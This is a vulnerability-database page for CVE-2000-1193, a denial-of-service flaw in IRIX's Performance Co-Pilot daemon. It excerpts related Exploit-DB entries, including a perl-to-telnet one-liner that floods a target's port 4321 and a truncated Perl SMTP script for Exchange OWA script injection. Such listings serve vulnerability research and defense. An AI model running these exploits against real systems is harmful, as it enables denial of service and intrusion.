CVE-2000-1193
published 2001-08-31CVE-2000-1193: Performance Metrics Collector Daemon (PMCD) in Performance Copilot in IRIX 6.x allows remote attackers to cause a denial of service (resource exhaustion) via…
PriorityP417medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.31%
87.0th percentile
Performance Metrics Collector Daemon (PMCD) in Performance Copilot in IRIX 6.x allows remote attackers to cause a denial of service (resource exhaustion) via an extremely long string to the PMCD port.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection
exploitdb·2006-06-13
CVE-2006-1193 Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection
Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection
---
source: https://www.securityfocus.com/bid/18381/info
Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability.
A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user.
#!/usr/bin/perl
use Net::SMTP;
my $to = "recipient\@domain.tld";
my $sub = "Watch out - Cross Site Scripting Attack";
my $from = "originator\@domain2.tld";
my $smtp = "mail.example.tld";
my $cont = "new($smtp);
$smtp->mail("$from") || die("error 1");
$smtp->to("$to") || die("error 2");
$smtp->data() ;
$smtp->datasend("To: $to\n") ;
$smtp->datasend("From: $from\n") ;
$smtp->datasend("Subject: $sub\n");
$smtp->datasend("Content-Type: text/html\n\n");
$
Exploit-DB
IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service
exploitdb·2002-04-12
CVE-2000-1193 IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service
IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service
---
source: https://www.securityfocus.com/bid/4642/info
Performance Co-Pilot (PCP) is a set of services to support system-level performance monitoring developed by SGI. It has traditionally been an IRIX product, however SGI has made it open source and it is now available for Linux systems.
A vulnerability exists in some versions of the PCP daemon. It is possible to cause a denial of service condition by sending the daemon a large string of arbitrary data.
% perl -e 'print " a" x 92834244,"\n";'' | telnet sgi.victim.com 4321
Exploit-DB
AOL Instant Messenger 4.0/4.1.2010/4.2.1193 - BuddyIcon Buffer Overflow
exploitdb·2000-12-12
CVE-2000-1094 AOL Instant Messenger 4.0/4.1.2010/4.2.1193 - BuddyIcon Buffer Overflow
AOL Instant Messenger 4.0/4.1.2010/4.2.1193 - BuddyIcon Buffer Overflow
---
source: https://www.securityfocus.com/bid/2122/info
AOL Instant Messenger (AIM) is a real time messaging service for users that are on line. When AOL Instant Messenger is installed, by default it configures the system so that the aim: URL protocol connects aim:// urls to the AIM client. There exists a buffer overflow in parsing aim:// URL parameters.
The buffer overflow has to do with the parsing of parameters associated with the "buddyicon" option. The stack overflow will occur If the "Source" parameter, which arguments the buddyicon option, is more than 3000 characters in length. It may be possible to execute arbitrary code. Since this vulnerability manifests itself in an URL, a user needs only to click on th
Exploit-DB
AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
exploitdb·2000-12-12
CVE-2000-1093 AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/2118/info
AOL Instant Messenger (AIM) is a real time messaging service for users that are on line. When AOL Instant Messenger is installed, by default it configures the system so that the aim: URL protocol connects aim:// urls to the AIM client. There exists a buffer overflow in parsing aim:// URL parameters.
This vulnerability exists in versions of AOL Instant previous to Messenger 4.3.2229. By sending a specially crafted URL ,using the 'aim:' protocol, comprised of 'goim' and 'screenname' parameters, it is possible for a remote user to overflow the buffer during a memory copy operation and execute arbitarary code.
It should be noted that the victim nee
Exploit-DB
Microsoft IIS 4.0/5.0 - Malformed Filename Request
exploitdb·2000-05-11
CVE-2000-0457 Microsoft IIS 4.0/5.0 - Malformed Filename Request
Microsoft IIS 4.0/5.0 - Malformed Filename Request
---
source: https://www.securityfocus.com/bid/1193/info
Requesting a known filename with the extension replaced with .htr preceeded by approximately 230 "%20" (which is an escaped character that represents a space) from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and its contents. This is due to the .htr file extension being mapped to ISM.DLL ISAPI application which redirects .htr file requests to ISM.DLL. ISM.DLL removes the extraneous "%20" and replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488.
This action can only be performed if a .htr request has not been previously made or if ISM.DLL is load
No writeups or analysis indexed.
ftp://patches.sgi.com/support/free/security/advisories/20020407-01-Ihttp://archives.neohapsis.com/archives/bugtraq/2000-04/0056.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/4284ftp://patches.sgi.com/support/free/security/advisories/20020407-01-Ihttp://archives.neohapsis.com/archives/bugtraq/2000-04/0056.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/4284
2001-08-31
Published